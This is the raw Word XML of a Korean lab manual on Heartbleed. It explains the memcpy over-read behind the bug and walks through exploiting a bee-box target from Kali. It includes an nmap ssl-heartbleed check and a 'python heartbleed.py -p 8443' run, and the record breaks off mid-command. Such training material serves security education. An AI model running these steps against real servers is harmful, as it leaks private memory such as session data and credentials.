                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74B160B7" wp14:editId="1203A2EB">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>979805</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>4679950</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="1156335" cy="229870"/>
                            <wp:effectExtent l="19050" t="19050" r="24765" b="17780"/>
                            <wp:wrapNone/>
                            <wp:docPr id="63" name="직사각형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56335" cy="229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390AAE" id="직사각형 63" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:77.15pt;margin-top:368.5pt;width:91.05pt;height:18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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                  <w:r w:rsidR="009706E0">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50943F70" wp14:editId="308DDD33">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>956310</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>3611245</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="3519170" cy="206375"/>
                            <wp:effectExtent l="19050" t="19050" r="24130" b="22225"/>
                            <wp:wrapNone/>
                            <wp:docPr id="53" name="직사각형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19170" cy="206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A440B6" id="직사각형 53" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:75.3pt;margin-top:284.35pt;width:277.1pt;height:16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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                  <w:r w:rsidR="00C97819">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19"/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D56E220" wp14:editId="4D6BC079">
                        <wp:extent cx="5462649" cy="5664835"/>
                        <wp:effectExtent l="0" t="0" r="5080" b="0"/>
                        <wp:docPr id="50" name="그림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5243" cy="5667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5232DA3" w14:textId="40584EAD" w:rsidR="00C97819" w:rsidRDefault="00C97819" w:rsidP="00C97819">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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코드 설명은 주석을 참고하면 된다.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 </w:t>
                  </w:r>
                  <w:r w:rsidR="009706E0"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이 코드에서,</w:t>
                  </w:r>
                  <w:r w:rsidR="009706E0"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 </w:t>
                  </w:r>
                  <w:r w:rsidR="009706E0"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알려진 취약점대로 요청 메시지 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidR="009706E0">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19"/>
                    </w:rPr>
                    <w:t>payload_length</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidR="009706E0"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필드를 </w:t>
                  </w:r>
                  <w:r w:rsidR="009706E0"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1000bytes, payload </w:t>
                  </w:r>
                  <w:r w:rsidR="009706E0"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필드를 </w:t>
                  </w:r>
                  <w:r w:rsidR="009706E0">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19"/>
                    </w:rPr>
                    <w:t>hi(2bytes)</w:t>
                  </w:r>
                  <w:r w:rsidR="009706E0"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라고 설정해서 서버로 보낸다고 가정 후 다음 코드를 분석해보자.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1AF0CF5B" w14:textId="0E1B80A7" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="00C97819">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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1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. payload 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변수의 값은 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1000bytes pl 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포인터에 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“hi”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의 시작 주소를 가리킨다.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="66558E4F" w14:textId="157447D8" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="00C97819">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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2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. 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응답 데이터를 위해 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buffer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에 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1+2+1000+16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이 확보될 것이다.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이 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buffer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의 주소를 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bp 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포인터로 지정한다.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="28F4EAE2" w14:textId="77D82214" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="00C97819">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia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3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. 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응답 메시지의 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/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payload_length</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/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필드에 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1000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이 포함된다.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="76309D2D" w14:textId="298F5E2D" w:rsidR="0070593F" w:rsidRDefault="009706E0" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia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4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. </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/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memcpy</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/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() 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함수를 이용해 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pl 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포인터에서 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1000bytes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를 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payload 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필드에 복사하며,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 pl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포인터가 가리키는 메모리 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“hi” (2bytes)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를 제외한 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998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bytes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가 통신과 관계없는 서버 메모리의 정보가 포함되게 된다.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이로 인하여 취약점이 발생한다.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="312334A8" w14:textId="77777777" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="25ABFD0E" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="7696B933" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="6BB32F44" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="4A33BA3D" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="6DC44C25" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="7EF6AB2C" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="3B1219BC" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="722F1A6A" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="0E26A0E9" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="0C3A28F7" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="3E62E738" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="728DBD9B" w14:textId="77777777" w:rsidR="00C96AF4" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr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</w:p>
                <w:p w14:paraId="52FD1124" w14:textId="734D2B94" w:rsidR="00C96AF4" w:rsidRPr="00D6576D" w:rsidRDefault="00C96AF4" w:rsidP="00202EC2">
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B0587D" w:rsidRPr="00BE7966" w14:paraId="554803C1" w14:textId="77777777" w:rsidTr="008A727E">
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="10686" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="562986AD" w14:textId="595EC720" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="008A727E">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:ind w:leftChars="0" w:left="360"/>
                    <w:jc w:val="righ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lastRenderedPageBreak/>
                    <w:t>실습 환경</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="12207F2E" w14:textId="48160581" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="008A727E">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:ind w:leftChars="0" w:left="360"/>
                    <w:jc w:val="righ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공격 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PC(Kali </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/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linux</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramStart"/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) :</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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 192.168.0.90/24</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="03BBC382" w14:textId="77777777" w:rsidR="00B0587D" w:rsidRPr="00BE7966" w:rsidRDefault="00B0587D" w:rsidP="008A727E">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:ind w:leftChars="0" w:left="360"/>
                    <w:jc w:val="righ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대상 PC(b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ee box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): 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192.168.0.9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/2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4</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B0587D" w:rsidRPr="00522648" w14:paraId="09BC2A0C" w14:textId="77777777" w:rsidTr="008A727E">
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="10686" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="46C4DF6D" w14:textId="68F72E24" w:rsidR="00B0587D" w:rsidRPr="00522648" w:rsidRDefault="00B0587D" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="47"/>
                    </w:numPr>
                    <w:ind w:leftChars="0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공격 수행</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="12A5D2D9" w14:textId="29150B07" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="008A727E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1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. </w:t>
            </w:r>
            <w:r w:rsidR="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>스크립트 생성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A0C9755" w14:textId="0132A896" w:rsidR="00D46CEB" w:rsidRDefault="00B0587D" w:rsidP="00D46CE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 w:rsidR="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">먼저 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>kali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에서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apache2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서버를 구동해준 뒤 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Beebox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D46CEB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="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>웹페이지에 접속한다.</w:t>
            </w:r>
            <w:r w:rsidR="00D46CEB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="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>heartbleed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D46CEB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="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">취약점을 선택한 뒤 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25AB6D53" w14:textId="6579D4BF" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ttack script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를 클릭하여 스크립트를 다운받는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beebox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에서 제공하는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heartbleed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공격 자동화 스크립트이다</w:t>
            </w:r>
            <w:r w:rsidR="005209BC">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005209BC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="005209BC">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">소스코드 분석은 </w:t>
            </w:r>
            <w:r w:rsidR="009E202F">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">매뉴얼 </w:t>
            </w:r>
            <w:r w:rsidR="005209BC">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>후반부에 작성하였으니 참고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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3479C705" w14:textId="2F3E8767" w:rsidR="00B0587D" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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F3AD17" wp14:editId="39C3BEB8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1967865</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1003935" cy="185420"/>
                      <wp:effectExtent l="19050" t="19050" r="24765" b="24130"/>
                      <wp:wrapNone/>
                      <wp:docPr id="141" name="직사각형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935" cy="18542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D9D25" id="직사각형 141" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:210.25pt;margin-top:154.95pt;width:79.0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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w: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31466EB4" wp14:editId="25786DBD">
                  <wp:extent cx="5525302" cy="2347415"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="140" name="그림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4184" cy="235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C93CA3" w14:textId="36B742FC" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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41D9290F" wp14:editId="1816BDC9">
                  <wp:extent cx="5552017" cy="2280062"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="142" name="그림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923" cy="2303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E3A794" w14:textId="23609CA3" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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4E443607" w14:textId="2D7E1E07" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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2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n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>map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>을 활용하여 취약점 여부를 확인한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D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">(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nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> –script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ssl-heartbleed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-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sV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-p 8443 [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beebox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IP] )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2508B879" w14:textId="6AAA18AB" w:rsidR="00D46CEB" w:rsidRDefault="008307E5" w:rsidP="00D46CE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3540FB9" wp14:editId="3B7B7E7E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295400</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="929640" cy="189865"/>
                      <wp:effectExtent l="19050" t="19050" r="22860" b="19685"/>
                      <wp:wrapNone/>
                      <wp:docPr id="146" name="직사각형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964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BEE43" id="직사각형 146" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:21.15pt;margin-top:102pt;width:73.2pt;height:1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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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D0E745C" wp14:editId="0BB083A4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488440</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1914525" cy="106045"/>
                      <wp:effectExtent l="19050" t="19050" r="28575" b="27305"/>
                      <wp:wrapNone/>
                      <wp:docPr id="147" name="직사각형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10604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2E5DB" id="직사각형 147" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:31.5pt;margin-top:117.2pt;width:150.75pt;height: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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B313A4" wp14:editId="0DB6D238">
                  <wp:extent cx="5552440" cy="2988310"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="143" name="그림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514" cy="2993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734543" w14:textId="77777777" w:rsidR="008307E5" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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lastRenderedPageBreak/>
              <w:t>3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. </w:t>
            </w:r>
            <w:r w:rsidR="008307E5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">취약점을 발견했으므로 패킷을 확인하기 위해 </w:t>
            </w:r>
            <w:r w:rsidR="008307E5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r w:rsidR="008307E5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">에서 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008307E5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>WireShark</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008307E5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>를 실행시킨다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F5038F0" w14:textId="20B35FE2" w:rsidR="00D46CEB" w:rsidRDefault="008307E5" w:rsidP="008307E5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그 후 </w:t>
            </w:r>
            <w:r w:rsidR="00D46CEB">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>스크립트를 실행해보면 도움말을 확인할 수 있다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63EE9931" w14:textId="62888477" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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79AD6CA2" wp14:editId="39AB6531">
                  <wp:extent cx="5588812" cy="1819871"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="144" name="그림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4827" cy="183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44719F" w14:textId="7F498510" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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4A8D5865" w14:textId="68E282DF" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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4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. SSL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취약점이므로 이를 공략하기 위하여 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>kali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에서 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>https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로 해당 홈페이지에 접속한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(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포트는 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>8443)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28F8DC4F" w14:textId="63587424" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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h</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ttps://192.168.0.9:8443</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EF746F4" w14:textId="54B7A0A6" w:rsidR="00D46CEB" w:rsidRPr="00BE7966" w:rsidRDefault="00D46CEB" w:rsidP="00D46CE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F8A34CA" wp14:editId="7F55E123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82675</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="541655" cy="161925"/>
                      <wp:effectExtent l="19050" t="19050" r="10795" b="28575"/>
                      <wp:wrapNone/>
                      <wp:docPr id="149" name="직사각형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65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7C874" id="직사각형 149" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:2.25pt;margin-top:85.25pt;width:42.6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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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099BF87" wp14:editId="1CAB01D7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323850</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1395095" cy="179070"/>
                      <wp:effectExtent l="19050" t="19050" r="14605" b="11430"/>
                      <wp:wrapNone/>
                      <wp:docPr id="148" name="직사각형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5095" cy="1790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888B2" id="직사각형 148" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:154.4pt;margin-top:25.5pt;width:109.85pt;height:14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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w: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1229306B" wp14:editId="67724DF9">
                  <wp:extent cx="5618073" cy="2846070"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                  <wp:docPr id="145" name="그림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1978" cy="286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87D" w14:paraId="1809B93D" w14:textId="77777777" w:rsidTr="008A727E">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="468283DE" w14:textId="421E49A7" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="008A727E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2E9F7F6E" w14:textId="3963992C" w:rsidR="00664756" w:rsidRDefault="00D46CEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008307E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해당 사이트에 로그인한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52A3B3" w14:textId="05353076" w:rsidR="008307E5" w:rsidRDefault="008307E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093A545C" wp14:editId="2726447E">
            <wp:extent cx="5632704" cy="3218180"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270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089" cy="322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DA028" w14:textId="4AF6AC7D" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB"/>
    <w:p w14:paraId="7AE12045" w14:textId="173A7BC1" w:rsidR="00D46CEB" w:rsidRDefault="008307E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>ali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 스크립트를 실행한다. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> heartbleed.py -p 8443 [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
